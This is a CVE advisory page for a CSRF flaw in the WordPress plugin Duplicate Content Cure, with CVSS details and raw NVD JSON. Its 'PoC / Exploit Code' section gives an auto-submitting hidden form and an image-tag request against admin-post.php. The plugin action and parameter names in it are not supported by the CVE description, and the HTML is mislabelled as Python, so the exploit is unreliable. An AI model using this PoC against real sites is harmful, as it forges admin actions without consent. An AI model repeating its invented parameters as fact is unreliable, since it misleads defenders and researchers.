Security Vulnerability Report
中文
CVE-2025-59132 CVSS 4.3 MEDIUM

CVE-2025-59132

Published: 2025-12-09 16:17:59
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Badi Jones Duplicate Content Cure duplicate-content-cure allows Cross Site Request Forgery.This issue affects Duplicate Content Cure: from n/a through <= 1.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Duplicate Content Cure <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-59132 --> <!-- Duplicate Content Cure Plugin CSRF Exploit --> <html> <body> <h2>CVE-2025-59132 CSRF PoC</h2> <p>Target: WordPress with Duplicate Content Cure plugin <= 1.0</p> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="csrf-form"> <input type="hidden" name="action" value="duplicate_content_cure_action"> <input type="hidden" name="subaction" value="clear_cache"> <input type="hidden" name="post_ids" value="1,2,3"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this text, the form was already submitted.</p> </body> </html> <!-- Alternative PoC with image onload --> <html> <body> <img src="http://target-site.com/wp-admin/admin-post.php?action=duplicate_content_cure_action&subaction=clear_cache" onerror="this.style.display='none'; alert('CSRF request sent');"> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59132", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:59.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Badi Jones Duplicate Content Cure duplicate-content-cure allows Cross Site Request Forgery.This issue affects Duplicate Content Cure: from n/a through <= 1.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/duplicate-content-cure/vulnerability/wordpress-duplicate-content-cure-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}